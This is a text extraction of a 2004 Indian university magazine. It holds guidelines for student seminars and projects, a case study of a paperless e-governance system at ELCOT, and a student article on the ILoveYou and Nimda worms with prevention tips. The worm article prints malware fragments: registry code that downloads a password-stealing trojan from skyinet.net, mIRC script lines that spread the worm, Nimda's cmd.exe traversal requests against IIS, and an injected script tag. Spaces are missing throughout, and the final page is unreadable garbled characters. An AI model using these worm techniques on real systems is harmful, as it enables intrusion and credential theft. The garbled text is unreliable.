for undergraduate engineering students in theirfinal year is an important and statutory part ofany university curriculum Seminar measuresmostly the external abilities and projectmeasures the internal abilities of a studentThrough seminar besides the technicalknowledge the presentation communicationand interpersonal skills of a student also getreflected Through project the depth of technicalknowledge acquired amp degree of understandingon fundamentals of engineering subjects by thestudent get evaluated Also to some extent thepresentation skills of a student gets reflect whenhe or she submits the project report and presentsbefore the audience (examiners studentcolleagues etc) A student goes through varietiesof engineering subjects (both theory andsessional) during his or her engineering studtyThese papers are mainly divided into twocategories (i) Core papers amp (ii) Supportingpapers Seminars and projects are based on thethorough understanding of all these papers bythe students Besides these course curriculumknowledge the projects amp seminars are alsobased on the extra or additional knowledgeacquired by the students by going throughvarious journals magazines research papersCDs internet amp reference books etc and byattending several tutorials workshopsseminars conferences symposiums andtechnical competitions etc

In short seminar and project are one typeof indicators of a students mental capability and

orientation to face and accept the practical andtechnical challenges in the real scenarios infuture

Role of faculty members as guides aco-guides

A student needs active support from his orher guide or co-guide for preparing himself orherself to present seminar and carrying out aproject work successfully Normally this guideis one of the faculty members of the concerneddepartment But some cases when a studentcarries out a project work in an organizationother than his or her institute a member of thatorganization becomes the guide However inthat case one of the faculty members of thedepartment must become a co-guide The role orthe co-guide is very important in the sense thathe or she has to orient the project done by thestudents as per the University guidelines Aseminar can be presented individually or ingroup (normally no of group members shouldnot exceed 3) Each Seminar team (either onemember or multiple members) must be linkedwith a guide called seminar guide Similarly aproject can be done individually or in group(normally no of group members should notexceed 5) Each project team (either one memberor multiple members) must be linked with a guideor co-guide called project guide or project co-guide Selecting a guide by a student group orvice versa is normally done through mutualconsultation Head of the department can playthe role of a negotiator in this situation For abetter focus and attention no of project teamsunder the supervision of a project guide or co-

OITS-2004

30

guide should not exceed 2 and no of seminarteams under the supervision of a seminar guideshould not exceed 4 Each group (either projector seminar) must submit an abstract or synopsisof the work to be done or presentation to be madeto their respective guides sufficiently before thecommencement of project work or seminarpresentation Seminar guides must ensure thattopics of seminars are of advanced amp state-of-the-art type These topics should not be from theUniversity course curriculum but can be basedon the basics of these subjects A schedule forthe seminar presentations should be notified byHOD to all concerned in a tabular manner withthe following fields representing the columns

rapport with them by directly speaking andby using proper eye contact A keennessshould be shown to them that thispresentation is for their learning amp benefitonly

b) The Middle bit is usually longest and canhave several sections This is structured witha logical sequence Movement from one areaor topic to another is done using verbal orvisual links OHP or LCD acetates are usefulfor breaking the middle bit up into smallerchunks

c) The End of the presentation should be asummary a conclusion a logical end to whathas gone before

iii) PracticeA number of practices should be made

about the presentation in front of the mirror infront of the cat before friends amp on ones ownetc If possible the audio visual equipments likeOHP LCD etc can be tried out before the actualday of presentations During practice feed backcan be obtained from friends regarding thespeaking speed (ie whether too fast or too slow)the visual aids (whether clear or not) logicalmovement of sequence (whether correct or not)amp overall performance (whether excellent goodor poor etc)

Following hints amp tips may be followedduring practice or at the time of actualpresentation Breathe slowly it calms you down Speak audibly but dont shout Speak at normal pare not very fast not

very slow Speak clearly Be enthusiastic Avoid using jargons and colloquialisms

unless these are familiar to the audience Be aware of your gestures

Date Time Slot Group Title of Formatof topic presentation

(LCD OHP)

Guidelines for Seminar Presentation3 PS Preparation Planning amp practicei) PreparationPreparation for seminar presentation can

be effectively done if the following questions areasked to themselves by the students concerned What do I want the audience to LEARN or

DO as a result of my presentation How can I keep the audience interested Do I know my subject

Fundamental rule is that keep itstraightforwardly simple which is abbreviatedas KISS

ii) Planning-Any form of communication should have

a structure Beginning a Middle bit and anEnda) The Beginning should tell the audience

what the presenter(s) is going to tell them Itshould be positive Presenter should engagethe audiences attention and establish

OITS-2004

31

Use large fonts if LCD or OHP are beingused

Learn from watching others follow thestrength amp reject the weaknesses of otherspeakers

Use lots of figures diagrams charts ampgraphs etc

Point to the projection (screen) not thesource

Maintain the timing perfectly

Guidelines for Project Presentation(We have assumed that project guides

project teams amp topics of the projects havealready been finalized)1st Step- Write the abstracts or synopsis of theproject2nd Step- Set a realistic timeframe

Assuming 100 effectives working days ina semester the following is a sample break upDefine your problem - - - - - - - -Write a proposal - - - - - - - -- - -Develop your solution - - - - - - -Implement your solution - - - - -Present your solution - - - - - - -Submit the project report - - - - -3rd Step-

Make proper evaluation amp assessment ofperformance of the students on the basis of finalproducts (results reports and presentation) andthe process by which they were attained Thegrade is given for the entirety of the project Asample grade system may be as followsA a consistently excellent effort that attains

project goalsB a consistently good effort that attains project

goalsC an acceptable effort that at least partially

attains the project goals

D an inconsistent or unsatisfactory effort thatonly partially attains project goals

F an unsatisfactory effort that does not attainproject goals

Tips for writing project reports 1) Sketch the outline of the project2) Expand your outline3) Write your paper4) Rewrite until you get it right

A sample outline for project reports Introduction Background Design Implementation System in Action Results Future work Conclusion ReferenceBesides these the cover page design

acknowledgement topic index index for figuresamp tales etc can be added at proper locations ofthe project report

ConclusionSince projects amp seminars are indicators of

internal amp external abilities of the engineeringstudents the respective faculty guides or co-guides must motivate their students in such amanner that they do not resort to any kind offalse means for carrying out these two mostimportant activities of their student carrer

20 days

20 days

60 days

About the author Prof MN Das is currently Professoramp HOD in the Department of Computer Science ampEngineering at KIIT Deemed University After completinghis BE in Electronics amp Telecommunication branch in1987 from UCE Burla he was with ECIL Hyderabadfor few months in its computer group Then he joinedas a lecturer in the Dept of Electronic amp Tele commengineering dept of UCE Burla and continued upto1987 He completed his ME in Electronics systems ampcommunication during this period He then joined OrissaState Electronic Development Corporation (OSEDC) Ltdfor 1987 amp continued upto 2002 During that period hecompleted his PG Diploma in Management atXIMBAfter a long 16yrs inducted experience in various areashe joined KIIT Deemed University from 2002 onwards

OITS-2004

32

Information and CommunicationTechnology (ICT) has today become an integralpart of governance especially in India ICT isviewed as a tool that will help deliver servicesboth in the public and the private sector to theubiquitous common man What used to takeyears to compile and analyse now takes just afew seconds or minutes

E-governance as a concept involvesleveraging ICT to streamline the administrativeprocess it involves computerisation of recordsfacilitating efficient transactions betweenvarious government departments networkingoffices and using websites and e-mail to bringadministrators closer to people

In the past decade e-governance has beena popular buzzword among politicians andbureaucrats alike especially in India One quasi-Government organisation in Tamil Nadu hasdecided to go the distance by implementing e-governance at a micro level their office is nowcompletely paperless and file-transfer takesplace in an electronic format

Using a tool aptly titled e-Administration Chennai-based ElectronicsCorporation of Tamil Nadu Ltd (ELCOT) withthe help of an Information and CommunicationTechnologies (ICT) organisation called Life-Lineto Business (LL2BCOM) has introduced aworkflow and document management processsans physical movement or use of paper

Designated by the Government of TamilNadu to promote IT industries in the stateELCOT besides supporting IT entrepreneurs also

Case study on ICT and e-GovKrishnan V D G

ICT amp e-Gov Specialistkrisdevgmailcom

promotes joint ventures in electronicscommunication and IT They also help developinfrastructure for the software industry in theform of IT parks and by providing effectivecommunication backbones

LL2BCOMs e-Administration toolallows ELCOT officials to sanction purchasesapprove official activities and transfer filesflawlessly in completely electronic format Witha view to introduce transparency in theirworkflow process all the files processed in theorganisation are made available on a centralserver while the status of pending files can beobtained at any stage There is no physicalmovement of files at any stage only the finalorder copies are printed and stored as physicalrecord

The Nuts and BoltsAs part of its e-governance initiative the

Government of Tamil Nadu embarked on apaper-less office drive for introducingtransparency and accountability in its internaland external transactions

ELCOT the nodal organization for ITactivities in the state decided to introduce e-Administration a paperless FileManagement System which ensures speedydisposal of files The entire process creationmovement monitoring and approval of filestakes place electronically resulting in betterutilisation of manpower This helps avoidingdelays which leads to better governanceaccording to Sudeep Jain IAS MD ELCOT

OITS-2004

33

e-Administration is the brainchild of ICTand e-Gov specialist VDG Krishnan who hasover a quarter of a century hands-on managerialexperience in the Public Sector in India and aleading MNC in North South America He isthe Founder President of Life-Line to Business(LL2BCOM Pvt Ltd) His urge was to developa simple yet effective solution that can help totransform the Governments Corporates SMEsand NGOs The tool was conceived by him afterhis return to India as an apt solution for e-Governance in the developing world based onhis experience in both the developing and thedeveloped world

e-Administration is a web-enabledplatform-independent paperless solutiondeveloped on an Open Source platform forpaperless communication within and outsidean organization It uses open source offeringssuch as J2EE JBOSS PGSQL all running onLinux

The tool according to Krishnan canreduce the cycle time for file approval from anaverage of two to three weeks to one week Thiscan also result in a considerable reduction ofpaper-usage within an organisation therebysaving valuable natural resources

According to Krishnan LL2Bs toolempowers every employee in the organizationto discharge his or her duties efficiently It hasalso reduced the dependence on subordinatesand makes the organization system-orientedrather than people-centric This is likely to resultin increased productivity

Being a Linux platform local languagecontent can also be easily added This tool canbe used by any organization whose activitiesinvolve dealing with multiple agencies forsimultaneous review and action The tool also

aids knowledge management and integrationin NGOs for self-assessment decentralised fieldupdating and centralised review andmonitoring

The ProcessELCOT conducted trials with products

offered by four to five SMEs for independentevaluation with a view to adopt the best toolThe SMEs were asked to implement thenecessary customisations to suit therequirements of ELCOT Govt

Trials were conducted over three to twelvemonths with equal opportunity given to all thevendors In each department one system wasconfigured as the server and five nodes (on anaverage) connected as clients for live testing

Says K Appuswamy General Manager (e-Governance) Many organizations hadconducted trials but only LL2Bs model workedsuccessfully at ELCOT

LL2BCOMs product was one of the fiveLAN based solutions tried out the front-endwas based on Visual Basic while the backendwas Microsoft Access SQL running on aMicrosoft Windows 2000 server in the initialtrials This tool was initially installed inELCOTs Marketing Department for about 5officers Seeing the effective use of the tool moreofficers and staff came forward voluntarily touse the tool Steadily the number was increasedand the solution upgraded to a browser basedweb version for removing the dependence onclient systems

Currently e-Administration systemconnects about 150 users in three differentlocations spread over a distance of about 25 KMsincluding their Corporate Office at Nandanamtheir Communication Division at Perungudy

OITS-2004

34

and their Chairman Mr Vivek Harinarain IASwho is the Secretary IT Govt of Tamil Nadu atthe Secretariat through a dedicated powerfulfour-way Xeon dual Processor with RAIDfacility running a versatile Oracle 9i databaseas backend on Linux advanced server centrallylocated at ELCOT Corporate office

The tool simplifies the process of generatingfiles and enables moving note sheetselectronically for approval Instead of physicallycarrying note sheets for approval from table totable the employees began using the tool Receiptof the e-document was indicated by pop-up alertmessages on the officers monitors

All letters received from external agenciescould now be scanned and converted intoelectronic documents which would then beadded to the central repository This systemenables a user to check the status of a file at anystage More importantly delays are minimisedas the files can be traced instantly through thenetwork employees can now know whichofficer has kept the file pending

The biggest advantage of e-Administration is that it enables us to view atany stage the status of pending file The detailsare available on a central server and can beaccessed by anyone having the authority Thisway workflow is simplified

LL2Bs e-Administration tool not onlyeffects a dramatic reduction of stationary usageand time taken to process documents it alsoserves to introduce transparency in the workingof any organisation

The employees of ELCOT also took to thesystem rather well According to AppuswamyOur employees became more and morecomfortable with using the tool as the trialsprogressed Its quite user-friendly and doesnt

require a lot of technical expertise I myself beganusing the system without any formal trainingand have been using it successfully for eightmonths now

AccoladesAt the 7th National e-Gov conference held

in Chennai in November 2003 MD ELCOTreceived a merit citation award from Governmentof India for implementation of e-Administration as a tool for e-Governance

The Industrial Guidance Bureau of theGovernment of Pondicherry has implementedan integrated e-Platform a quickly customizedsolution of e-Administration to automate theactivities of the Department of Industries andCommerce (Refer Budget 2004-2005 Addressof HE the Lt Governor Pondicherry httpwwwp on nic inopend eptsf in anc elgspeech2004pdf)

Item 7 of the speech reads as followsRemoval of poverty may not be

practically possible without focusing specialattention on creation of gainful jobopportunities The Tenth plan at the nationallevel envisages creation of 50 million newemployment opportunities over a period of fiveyears Therefore focused attention will be givento few critical sectors such as

Industries Information Technology etcwhich have very high employment potential

Item 19 of the speech reads as followsThe manufacturing sector of the economy

has potential to absorb the surplus labour forceThe labour intensive manufacturing units canprovide gainful job opportunities for skilled aswell as semi-skilled labour force We willcontinue to encourage new entrepreneurs tochoose Pondicherry as their destination for

OITS-2004

35

establishing new industrial units andprocedures will be simplified to obtain licence permission to start units We will continue topursue the policies of promoting pollution freeless water and less power consuming industriesin our Union Territory

Item 20 of the speech reads as followsIndustrial Guidance Bureau with

integrated e-Platform has been established bysubstituting single window clearance system tospeed up the process of industrial clearance permission for setting up of new industrial unitsA total of 21 Departments includingMunicipalities Commune Panchayats havebeen integrated with a dedicated electronicnetwork for granting permission to set up anindustry and also to commence production

This saves a lot of time effort and cost toindustrialists and citizens as well as officials ofvarious Departments As against submitting 10copies of documents in the manual system inthe electronic system only one signed copy needsto be submitted thereby saving 90 of paperresulting in conserving of natural forestresources

A unique initiative being attempted for thefirst time in India 21 Departments includingmunicipalities and Panchayats are connectedon a simple dial-up The central repository serverwill be located at the District Industries CentrePondicherry This will form a dedicatedelectronic network The network will allow theGovernment to grant permission for example toset up an industry it can also help amanufacturing unit obtain a Licence tocommence production etc

Says Krishnan This would save a lot oftime effort and cost to industrialists and citizensas well as officials of various Departments As

opposed to submitting 10 copies of documentsin the manual system in the electronic systemonly one signed copy needs to be submittedthereby helping save paper It can help to fuelinvestment in the State and generateemployment for local people

Such an integrated e-Platform can be usedby the ministries and Undertakings of theCentral Government as well as various StateGovernments where ever multiple agencies areinvolved in scrutinizing applications andgranting time bound clearances for planapproval building constructions setting-upindustries etc It can bring about the muchdesired transparency and accountability

Various Central and State GovernmentDepartments and Undertakings including theAndhra Pradesh Technology Services theGovernments of West Bengal Orissa ManipurGoa etc State Bank of India the CanadianConsulate in Chennai British Trade Office(Bangalore) Ministry of Industrial DevelopmentMalaysia and the State of Sarawak Malaysiahave shown interest in e-Administration aweb enabled solution developed using opensource This can considerably cut down thebudget expenditure for e-Governance accordingto Krishnan

Instead of resting on their laurels LL2Bplans to reach out to the various GovernmentDepartments and Undertakings as well asCorporates SMEs and NGOs by implementingtheir solutions in as many public and privateorganisations as possible in India and thedeveloping world by offering the basic solutionfree and charging only for the customisationinstallation training hand holding annualmaintenance and upgrade support eitherdirectly or through ELCOT with whom LL2Bhas a marketing tie-up This is expected to benefit

OITS-2004

36

vastly Governments in India and the developingworld by saving on e-Governance expenditureWe are currently holding discussions with theChennai Metropolitan Development Authority(CMDA) and The Tamil Nadu Dr MGRMedical University to implement e-Administration in their offices institutionsacross the city says Krishnan

Shri D Jayakumar the Hon Minister forIT Govt of Tamil Nadu had stated in the StateAssembly

The Government has also decided to takeup development of four generic softwares paperless office electronic delivery of servicesdevelopment of government portal andintegrated district information system

Of these the paperless office was alreadyin place in ELCOT

While its naiumlve to believe that e-Administration paperless office solutions likeLL2Bs may just be the panacea for our red-taperidden bureaucracy it certainly is a step in theright direction one small step for e-governance a giant leap for democracy

Why ELCOT took the plunge

1 The number of major departments 42 The average number of files generated per

department per year 1503 The average number of physical

movements per file 204 The average number of cycles per file from

start to end 8The total number of manual entries file

movement from desk-to-desk per year4x150x20x8 = 96000 manual entries or filemovements per year

The workload is not evenly distributed asit depends on a hierarchy for granting sanctionandor approval of files The Managing Director(MD) typically has to view and approveapproximately 200 files per week That is anaverage of 40 files per working day This is apartfrom the various meetings he has to attend Filespile up when he is on tour and he is forced tocarry work home When the officer is away filesare kept pending The officer may not even knowthat there are files pending even if they are urgentThese problems cause inordinate delays in theworkflow process A tool such as e-Administration ensures prompt disposal of filesand access to a central database where the statusof files can be monitored at every stage thusensuring efficiency and transparency

Sudeep Jain MD ELCOT confirms thatwhile average cycle time for file approval wasearlier 15 to 21 days after the implementationof the electronic system it was brought down to5 to 7 days

Source E-ADMINISTRATION THE KEY FOR E-GOVERNANCE - INITIATIVES FORCREATING A PAPERLESS OFFICE bySudeep Jain IAS Managing Director ELCOTChennai-35 presented at the 7th National e-Gov Conference in Nov 2003 conducted by theDepartment of Administrative Reforms andPublic Grievances Ministry of PersonnelPublic Grievances and Pension Govt of India

Further enquiries on e-Administration or onimplementing e-Governance Corporate Governancemay be addressed to Mr Krishnan at krisdevgamilcom

OITS-2004

37

Intruders who access networks and systems without authorization or inside attackers withmalicious motives can plant various types of programs to cause damage to the network Theseprograms often lumped together under the general term viruses although other varieties have costcompanies and individuals billions of dollars in lost data lost productivity and the time andexpense of recovery Some of the more destructive examples of malicious code also sometimesreferred to as malware [MALicious softWARE - mark the uppercase MALWARE] over the pastdecade are CIHChernobyl Melissa Code Red Nimda Klez

Now Im going to explain about the two most popular malwares - some exploits which thesemalwares used but NOT how the whole code worked or how to code a malware to exploit

I Love You Worm

The I Love You virus is a little more bulky so I chose not to include the entire script here Youcan download all of the I Love You source from httpwwwpacketstormsecurityorgviral-dblove-letter-sourcetxt

What is interesting to note about the I Love You virus is that it randomly changed the usersdefault Web browser homepage to one of four locations as seen here by the code

num = Int((4 Rnd) + 1)if num = 1 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~young1sHJKhjnwerhjkxcvytwertnMTF wetrdsfmhPnjw6587345gvsdf7679njbvYTWIN-BUGSFIXexe

elseif num = 2 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~angelcatskladjflfdjghKJnwetryDGF ikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4wWIN-BUGSFIXexe

elseif num = 3 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~koichijf6TRjkcbGRpGqaq198vbFV5hfFE kbopBdQZnmPOhfgER67b3VbvgWIN-BUGSFIXexe

elseif num = 4 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~chusdgfhjksdfjklNBmnfgkKLHjkqwtuHJB hAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234 iuy7thjgWIN-BUGSFIXexe

end ifend if

Known Malware ExploitationAbhishek Bhuyan

KIIT Student

OITS-2004

38

The WIN-BUGSFIXexe turned out to be a Trojan application designed to steal passwordsNow a quick look notices all of the URLs present are on wwwskyinetnet This resulted in manyplaces simply blocking access to that single host While bad for skyinetnet it was an easy fix foradministrators Imagine if the virus creator has used more popular hosting sites such as the membershomepages of aolcom or even made reference to large sites such as yahoocom and hotmailcom would administrators rush to block those sites as well Perhaps not Also had someone at skyinetnetbeen smart they would have replaced the Trojan WIN-BUGSFIXexe with an application that woulddisinfect the system of the I Love You virus That is if administrators allowed infected machinesto download the Trojaned Trojan

I Love You also modifies the configuration files for mIRC a popular Windows IRC chat clientif (s=mirc32exe) or (s=mlink32exe) or (s=mircini) or(s=scriptini) or (s=mirchlp) thenset scriptini=fsoCreateTextFile(folderspecampscriptini)

scriptiniWriteLine [script]scriptiniWriteLine mIRC ScriptscriptiniWriteLine Please dont edit this script mIRC will corrupt if mIRC willscriptiniWriteLine corrupt WINDOWS will affect and will not run correctly thanksscriptiniWriteLine scriptiniWriteLine Khaled Mardam-BeyscriptiniWriteLine httpwwwmirccomscriptiniWriteLine scriptiniWriteLine n0=on 1JOINscriptiniWriteLine n1= if ( $nick == $me ) halt scriptiniWriteLine n2= dcc send $nick ampdirsystemampLOVE-LETTER-FOR-YOUHTMscriptiniWriteLine n3=scriptinicloseHere we see I Love You making a change that would cause the users IRC client to send a copy

of the I Love You virus to every person who joins a channel that the user is in Of course the filenamehas to be enticing to the users joining the channel so they are tempted into opening the file- Nimda Worm -

In September 2001 a very nasty worm reared its ugly head The Nimda (Just reverse nimdaand you get admin) worm also called the Concept viruswas another worm which propagated viaMicrosoft hostsNimda featured multiple methods to infect a host

It could send itself via e-mail It would attach itself as an encoded exe file but would use anaudiox-wave Multipurpose Internet Mail Extensions (MIME) type which triggered a bug in InternetExplorer to automatically execute the attachment upon previewing the e-mail Once the attachmentwas executed the worm would send itself to people in the users address book as well as e-mailaddresses found on Web pages in Internet Explorers Web page cachethat means the worm wouldactually find e-mail addresses on recently browsed Web pages The worm would scan for vulnerableIIS machines looking for the rootexe files left over from the Code Red II and Sadmind worms aswell as using various Unicode and double-encoding URL tricks in order to execute commands onthe serverThe following is a list of requests made by the worm

GET scriptsrootexec+dir

OITS-2004

39

GET cwinntsystem32cmdexec+dirGET dwinntsystem32cmdexec+dirGET MSADCrootexec+dirGET scripts5cwinntsystem32cmdexec+dirGET scriptsxc1x1cwinntsystem32cmdexec+dirGET scriptsxc0winntsystem32cmdexec+dirGET scriptsxc0xafwinntsystem32cmdexec+dirGET scriptsxc1x9cwinntsystem32cmdexec+dirGET scripts35cwinntsystem32cmdexec+dirGET scripts35cwinntsystem32cmdexec+dirGET scripts5cwinntsystem32cmdexec+dirGET scripts2fwinntsystem32cmdexec+dirGET _vti_bin5c5c5cwinntsystem32cmdexec+dirGET _mem_bin5c5c5cwinntsystem32cmdexec+dirGET msadc5c5c5cxc1x1cxc1x1cxc1x1cwinntsystem32

cmdexec+dirOnce the worm found a vulnerable IIS server it would attempt to Trivial File Transfer Protocol

(TFTP) the worm code to the target server It would also modify the IIS server by creating a guestaccount and adding it to the Administrators group It would also create a Windows share of theC drive (using the name C$)

All local hypertext markup language (HTML) and Application Service Provider (ASP) fileswould be modified to include the following code snippet

ltscript language=JavaScriptgtwindowopen(readmeeml null resizable=notop=6000left=6000)ltscriptgtIn addition the worm would copy itself to the readmeeml file The final result was that

unsuspecting Web surfers would automatically download and possibly execute the worm froman infected Web site

The worm copies itself into EML and NWS in various local and network directories If anunsuspecting user uses Windows Explorer to browse a directory containing these files it is possiblethat the automatic preview function of Explorer would automatically execute the worm This wouldallow the worm to propagate over file shares on a local network

The worm also copies itself to richeddll which is an attempt to Trojan Microsoft Officedocuments since documents opened in the same directory as the richeddll binary will load andexecute the Trojan DLL

The end result was a noisy but very effective worm It was noisy because it created many EMLand NWS files on the local system It also modified Web pages on the Web site which made it easyto remotely detect a compromised server But the multi-infection methods proved quite effective andmany people who had run through and removed the worm had found that their systems keptgetting infectedit is a tough worm to fully eradicate To properly combat it the securityadministrator needed to patch their IIS server upgrade their Microsoft Outlook client and be cautiousof browsing network shares Full information on the Nimda worm is available in the Security Focusanalysis

httparissecurityfocuscomalertsnimda010921-Analysis-Nimda-v2pdf

OITS-2004

40

Some tips on prevention and responseProtecting systems and networks from the damage caused by Trojan horses viruses and

worms is mostly a matter of common sense Practices that can help prevent infection include thefollowing Do not run executable (EXE) files from unknown sources including those attached to an e-

mail or downloaded from web sites Turn off the Preview andor HTML mail options in the e-mail client program Do not open Microsoft Office documents from unknown sources without first disabling

macros Be careful about using diskettes that have been used in other computers Install and use firewall software Install antivirus software configuring it to run scans automatically at predefined times and

updating the definition files regularly Use intrusion prevention tools called behavior blockers that deny programs the ability to

execute operations that have not been explicitly permitted Use integrity checker software (such as Tripwire) to scan the system for changes Recognizing the presence of a malicious code is the first-response step if a system gets infected

Administrators and users need to be on the alert for common indications that a virus mightbe present such as the followingMissing files or programsUnexplained changes to the systems configurationUnexpected and unexplained displays messages or soundsNew files or programs that suddenly appear with no explanationMemory leaks (less available system memory than normal)Unexplained use of disk spaceAny other odd or unexplained behavior of programs or the operating system

- If a virus is suspected a good antivirus program should be installed and run to scan thesystem for viruses and attempt to remove or quarantine any that are found Finally allmission-critical or irreplaceable data should be backed up on a regular basis in case all thesemeasures fail

Virus writers are a creative and persistent bunch and will continue to come up with new waysto do the impossible so computer users should never assume that any particular file type or OSis immune to malicious code The only sure way to protect against viruses is to power down thecomputer and leave it turned off -)

Information about specific viruses and instructions on how to clean an infected system isavailable at httpwwwsymanteccom and httpwwwmcafeecom Both antivirus vendorsprovide detailed databases that list and describe known viruses But I recommend being touch withthe site httpwwwsecuritynewsportalcom here you will get hourly updates about latest securityhacking virus and trojan news

luckylucky-webnethttpwwwlucky-webnet

Orissa Network Security Group httpgroupsyahoocomgrouporissa-netsec

OITS-2004

41

LOtilde`EcircOcircVethornethorn S_ecirc J aTHORNLETHhOgraveSOcircETH[THORN eamp_ OgravekthornETH[ETH

LTHORNVccedil XTHORNcccedilXccedil aTHORNhegraveaTHORN]OcircETHfmacrAElig bEcircthornaOgrave_hegraveethorn

ASTHORNLETHmTHORNthorn LfETH aTHORNsETH_ aETHZTHORNSOcirc ethornETHS_Ntilde[THORNHaOtilde agrave_Ntilde[THORN A]THORN jcordfAElig Ogravel[oumlOgraveethorn LOtilde`EcircOcircVeethornthornakEcircthornf aOcircakthornETHethorn OgravekthornDRTHORNfrac14frac14ETH Ograve[ZEcirc HkTHORNthorn dsectAEligVTHORNaTHORNimacrAEligOgraveethorn LTHORNRTHORN SETHZTHORNaETH Acethorn jETHcETHSTHORNL LragravethornaOcircfrac14frac14ETHd]THORNJ LOtilde`EcircOcircVethorn aTHORNsETH_ HL A^Ecirc_THORNL aTHORN]OcircETHbthornETHaOgraveethorn `eTHORNthornNZTHORN[ HkthornETH `EcircethornETH[_ dEcircNeEcircthorn aTHORNhegraveethornjcordfAElig aTHORN]OcircETHOgraveethorn Aacutecurren akEcircthornOgrave[ D`OgravedETHN OgravekthornETHBAjEcircRTHORNfrac14frac14ETH HL]ETH SOgraveZ XETHbrvbarAEligethorn SOgraveZ LOtilde`EcircOcircVethornaTHORNOgravehyacuteiL HaOtilde jTHORNbTHORNthornmccedilthorn dsectAEligNtildefrac14 c^OcircOgraveethorn aTHORNaETH]mthornETHNTHORNmthornETHfrac14frac14ETH XETHbrvbarAEligethorn dEcircbrvbarTHORNAEligLOgravemthorn bthornNaETH_ccedil A]ETHcccedilEcircfrac14NYIumlTHORNOgravemthornfrac14frac14ETH Bbccedilthorn OgraveplusmnAEligETH`QETHethorn cETH^OcirccOgraveethorn A]ETHcccedilfrac14NbagravethorneEcircthorn AaTHORNbagravethornETHa OgravekthornOgravemthornfrac14frac14ETH `Ograveethorn `Ograveethorn joacutefrac12THORNcurrenaYIumlTHORNQETHmTHORNthornmthornETHfrac14frac14ETH Ograve[ZEcirc XETHbrvbarAEligethornNtilde aTHORN]OcircETH kUacutethorn jaagrave EcircethornETH[_frac14frac14ETHHkthornETH hEcircZTHORN jTHORNbTHORNthornmccedilthorn dsectAEligNtilde LkTHORNthornOgravemthorn _UumlETH _UumlETH bthornNaETH_ccedil`otildeOgravec jegraveNagraveLEcirc _THORNcagraveETHZ LOgravemthornfrac14frac14ETH HkthornETH`Ograveethorn `oacuteTHORNaNtildejoacutefrac12THORNcurren OgravekthornmthornETHfrac14frac14ETH OgravejTHORN ETHBUuml jTHORNbTHORNthornmccedilthorn dsectAEligNtildefrac14ethornAahOcircL[ETH OgravekthornETHBTHORNmthornETHfrac14frac14ETH Ograve[ZEcirc jTHORNbTHORNthornmccedilthorn BampTHORNfrac14_THORN AEligeTHORNOtildethornOgravekthornDRTHORN jaagrave EcircethornETH[_ aTHORN]OcircETHfrac14frac14ETH jaEcirc hEcircZTHORN LOtilde`EcircOcircVethornaTHORNOgravehyacuteiL Aacutecurren kthornjTHORN Drthornethorn Ograve]Ogravemthorn A`ZcETHOgrave_`otildeOgrave[OcircL aTHORN]OcircETHLEcirc HL _THORN~Ugravefrac12curren LotildecOgraveethorn `otildeLETHhLeEcircthornRlaquoTHORNAEligAEligfrac14frac14ETH agraveETH[ccedil HL LETHdagraveOcirc jeTHORNthornaETH `Ograveethorn ]eacuteTHORN[NtildemacrAEligLETHdagraveOcirc LeTHORNthornaETHethorn `w[THORN OgraveLDUuml aTHORN]OcircETHOgraveethorn ethornkTHORNthornRTHORN HkthornETH hEcircZTHORNaETH`Ograveethorn XETHbrvbarAEligethorn HaOtilde jTHORNbTHORNthornmccedilthorn BOtildeSTHORN_THORN AEligethornordfAElig AEligAElig OgravekthornETHB dETHBTHORNOgravemthornfrac14frac14ETH HkthornETHkUacutethorn LOtilde`EcircOcircVethorn aTHORN]OcircETHethorncEumlfcsectAEligfrac14frac14ETH LOtilde`EcircOcircVethornethorn aTHORNaragravethorn_LEcirc _Ecirc OcircETH_ LOgravemthorn

AOgravecdividecETHOgrave_ SETHZTHORN ETHeTHORNthornaETH Ograved A^Ecirc_THORNL LOtilde`EcircOcircVethornethornS_L OgravekthornDRlaquoTHORNAEligAElig QETHmccedilthornjagrave aOcircETHOgraveaSccedilfrac14frac14ETH Ogravej 1834cjTHORNkthornETHOgraveethorn A_ETHmTHORNthornVTHORNLETHmccedilthorn BampTHORNfrac14_ccedil _ETHcLLOtilde`EcircOcircVethornVTHORNH DiexclthornETHa_ LeTHORNthornBOgravemthornfrac14frac14ETH `Ograveethorn `OgraveethornS_ccedil bTHORNthorn_THORNOgravejAtildeccedilcurren AVETH_ETHj$ccedilfrac14 HaOtilde LiacuteTHORNOgrave$frac14ETHXagraveIuml OgraveaeTHORNthorncTHORNhTHORN ABgETH Ogravefrac12currenVccedil macrEcircAElig_THORNbthornethornjTHORNVTHORNOgraveethorn `otildecBOgravemthornOgraveIacuteAEligETH_THORNLccediljccedil (Electronics) LOtilde`EcircOcircVethorn[THORNAeTHORNthorn LeTHORNthornTHORNOgravemthornfrac14frac14ETH HkTHORNthornWETHOgraveethorn kUacutethorn $frac14ETHfrac12currenOgraveSOgrave_Ograveethornj_ccedil (First Generation)LOtilde`EcircOcircVethornethorn S_ecirc OgravekthornETHBTHORNmthornETHfrac14frac14ETH ]eacuteTHORN[NtildemacrAElig aTHORNhegravedEcircwjcmacrAEligOgraveethorn H_THORNALccedil (ENIAC) LOtilde`EcircOcircVethorn _THORNcUgrave[OgravekthornETHBTHORNmthornETHfrac14frac14ETH 1946 cjTHORNkthornETHOgraveethorn _THORNcUgrave[ HkTHORNthornLOtilde`EcircOcircVethornLEcirc ethornMTHORNaETH `ETHBUuml 50 $Ecircfrac14Vccedil x 30 $Ecircfrac14VccedilOethornethorn AahOcircL[ETH OgravekthornETHBTHORNmthornETH HaOtilde HkthornETHethorn JS_THORNmthornETH 30 V_ccedilfrac14frac14ETH HkTHORNthorn LOtilde`EcircOcircVethornOgraveethorn 18000bthornOcircETHLEcirccccedil VEcircOcircaccedil (Vaccum tube) mthornETHNTHORNTHORNmthornETHfrac14frac14ETHHkthornETH HL OgravejOgraveLumlAEligOgraveethorn 5000 `dagraveOcirclaquoAElig cTHORNhETHZ(Addition) LeTHORNthorn `ETHeEcircthornTHORNmthornETHfrac14frac14ETH HkthornETH c_EcirciOcircWETHeEcircthorn[OcirclaquoAEligAElig lTHORN otilde THORNmthornETHfrac14 